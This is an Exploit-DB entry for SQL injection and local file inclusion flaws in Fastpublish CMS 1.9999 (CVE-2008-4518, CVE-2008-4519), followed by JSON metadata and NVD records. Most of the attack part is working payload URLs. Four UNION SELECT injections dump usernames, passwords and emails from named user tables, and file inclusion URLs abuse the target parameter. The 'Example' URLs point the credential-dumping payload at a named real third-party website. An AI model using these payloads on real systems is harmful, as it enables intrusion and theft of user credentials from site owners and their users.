ID EDB-ID:6678
Type exploitdb
Reporter ~!Dok_tOR!~
Modified 2008-10-05T00:00:00
Description
Fastpublish CMS 1.9999 (LFI/SQL) Multiple Remote Vulnerabilities. CVE-2008-4518,CVE-2008-4519. Webapps exploit for php platform
Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: fastpublish CMS
Version: 1.9.9.9.9.d
URL: www.fastpublish.de
Download: http://www.fastpublish.de/rich_files/attachments/downloads/fastpublish_19999d_trial.zip
Vulnerability Class: SQL Injection
SQL Injection
Exploit 1:
http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/*
Exploit 2:
http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/*
Exploit 3:
http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,benutzer,passwortm,email),7,8,9,10+from+fastpublish_benutzer/*
Exploit 4:
http://localhost/[installdir]/index.php?artikel=-1+union+select+1,2,concat_ws(0x3a,user_type,user_name,user_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+fastpublish__forumen_userdata/*
Example:
http://www.jeremias-d-meissner.de/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type ,user_name,user_pw),7,8,9,10+from+fastpublish__for um_de_userdata/*
File inclusion
http://localhost/index2.php?artikel=3&target=./[file]
http://localhost/index.php?artikel=2&target=./[file]
Example:
http://www.jeremias-d-meissner.de/index2.php?artikel=3&target=./forgotpassword.php
# milw0rm.com [2008-10-05]
{"id": "EDB-ID:6678", "type": "exploitdb", "bulletinFamily": "exploit", "title": "fastpublish CMS 1.9999 - LFI/SQL Multiple Vulnerabilities", "description": "Fastpublish CMS 1.9999 (LFI/SQL) Multiple Remote Vulnerabilities. CVE-2008-4518,CVE-2008-4519. Webapps exploit for php platform", "published": "2008-10-05T00:00:00", "modified": "2008-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6678/", "reporter": "~!Dok_tOR!~", "references": [], "cvelist": ["CVE-2008-4519", "CVE-2008-4518"], "lastseen": "2016-02-01T01:23:31", "viewCount": 19, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-02-01T01:23:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4518", "CVE-2008-4519"]}], "modified": "2016-02-01T01:23:31", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/6678/", "sourceData": "Author: ~!Dok_tOR!~\nDate found: 30.09.08\nProduct: fastpublish CMS\nVersion: 1.9.9.9.9.d\nURL: www.fastpublish.de\nDownload: http://www.fastpublish.de/rich_files/attachments/downloads/fastpublish_19999d_trial.zip\nVulnerability Class: SQL Injection\n\nSQL Injection\n\nExploit 1:\n\nhttp://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/*\n\nExploit 2:\n\nhttp://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/*\n\nExploit 3:\n\nhttp://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,benutzer,passwortm,email),7,8,9,10+from+fastpublish_benutzer/*\n\nExploit 4:\n\nhttp://localhost/[installdir]/index.php?artikel=-1+union+select+1,2,concat_ws(0x3a,user_type,user_name,user_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+fastpublish__forumen_userdata/*\n\nExample:\n\nhttp://www.jeremias-d-meissner.de/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type ,user_name,user_pw),7,8,9,10+from+fastpublish__for um_de_userdata/*\n\nFile inclusion\n\nhttp://localhost/index2.php?artikel=3&target=./[file]\n\nhttp://localhost/index.php?artikel=2&target=./[file]\n\nExample:\n\nhttp://www.jeremias-d-meissner.de/index2.php?artikel=3&target=./forgotpassword.php\n\n# milw0rm.com [2008-10-05]\n", "osvdbidlist": ["48851", "49007", "48852", "48853"]}
{"cve": [{"lastseen": "2020-10-03T11:51:02", "description": "Multiple directory traversal vulnerabilities in Fastpublish CMS 1.9999 d allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the target parameter to (1) index2.php and (2) index.php.", "edition": 3, "cvss3": {}, "published": "2008-10-09T18:14:00", "title": "CVE-2008-4519", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4519"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:fastpublish:fastpublish_cms:1.9999d", "cpe:/a:fastpublish:fastpublish_cms:1.9.9.9.9d"], "id": "CVE-2008-4519", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4519", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fastpublish:fastpublish_cms:1.9.9.9.9d:*:*:*:*:*:*:*", "cpe:2.3:a:fastpublish:fastpublish_cms:1.9999d:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:02", "description": "Multiple SQL injection vulnerabilities in Fastpublish CMS 1.9.9.9.9 d (1.9999 d) allow remote attackers to execute arbitrary SQL commands via the (1) sprache parameter to index2.php and the (2) artikel parameter to index.php.", "edition": 3, "cvss3": {}, "published": "2008-10-09T18:14:00", "title": "CVE-2008-4518", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4518"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:fastpublish:fastpublish_cms:1.9999d", "cpe:/a:fastpublish:fastpublish_cms:1.9.9.9.9d"], "id": "CVE-2008-4518", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4518", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fastpublish:fastpublish_cms:1.9.9.9.9d:*:*:*:*:*:*:*", "cpe:2.3:a:fastpublish:fastpublish_cms:1.9999d:*:*:*:*:*:*:*"]}]}
